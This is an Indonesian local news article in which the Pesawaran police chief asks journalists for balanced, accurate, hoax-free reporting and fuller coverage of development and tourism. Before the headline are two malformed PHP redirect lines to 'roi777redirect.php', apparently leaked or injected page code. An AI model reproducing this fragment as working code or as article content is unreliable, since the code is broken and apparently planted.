header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Kapolres Pesawaran: Berita Harus Berimbang dan Akurat -
Kapolres Pesawaran: Berita Harus Berimbang dan Akurat

TRANSLAMPUNG.COM, PESAWARAN – Kapolres Pesawaran AKBP Syaiful Wahyudi, S.IK, M.H mengharapkan kepada para wartawan di kabupaten tersebut, dalam pemberitaan yang ditulis hendaknya berimbang dan dapat dipertanggungjawabkan.

”Kita berharap kepada teman-teman wartawan semua hendaknya dalam pembuatan berita harus berimbang dan akurasi data yang bisa dipertanggungjawabkan dalam menulis berita,” ujarnya, saat audiensi dengan para insan pers di aula polres setempat, Rabu (10/1).

Dia mengatakan, para wartawan hendaknya jangan sampai dalam pembuatan berita yang ditulis dengan tendensius atau fitnah dan berita bohong atau hoax, karena ini semuanya nati akan menimbulakan gejolak.

“Intinya kita berharap kepada wartawan yang menyajikan pemberitaan hendaknya terlebih dahulu mengumpulkan data-data sebelum diekspose, agar natinya bisa dipertanggungjawabkan,” imbaunya.

Dia juga mengharapkan proses pembangunan atau wisata di beberapa daerah Pesawaran juga diberitakan dengan lengkap, agar masyarakat mengetahui. Ini sangat baik bagi perkembangan daerah yang dapat disampaikan melalui media.

“Pembangunan dan pariwisata ini juga perlu diberitakan yang sebenar-benarnya, supaya masyarakat luar juga tahu adanya hal ini ,”ucapnya

Tujuan pihaknya mengadakan audiensi dengan para awak media untuk bersinergi dan meningkatkan silaturahmi dengan jajaran pers.

“Kita juga berharap dengan adanya agenda yang kita laksanakan ini bisa memberi masukan dan kritik membangun dari kawan-kawan media, sehingga tahu yang harus kita benahi, terutama di Polres Pesawaran ini, demi kemajuan Pesawaran,” jelasnya.

Hadir Wakapolres Pesawaran Kompol Dwi Heno, Kaur Humas Polres Pesawaran Ipda Santi dan awak media yang ada di Kabupaten Pesawaran. (ydn/rus)

News Reporter